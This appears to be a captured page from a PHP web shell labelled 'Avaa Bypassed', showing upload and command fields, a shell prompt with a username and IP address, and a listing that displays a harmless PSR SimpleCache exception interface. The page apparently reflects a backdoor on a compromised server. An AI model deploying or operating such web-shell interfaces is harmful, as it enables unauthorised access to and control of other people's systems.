404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.117.100.220: ~ $
<?php

namespace Psr\SimpleCache;

/**
 * Exception interface for invalid cache arguments.
 *
 * When an invalid argument is passed it must throw an exception which implements
 * this interface
 */
interface InvalidArgumentException extends CacheException
{
}

Filemanager

Name Type Size Permission Actions
CacheException.php File 173 B 0644
CacheInterface.php File 4.71 KB 0644
InvalidArgumentException.php File 260 B 0644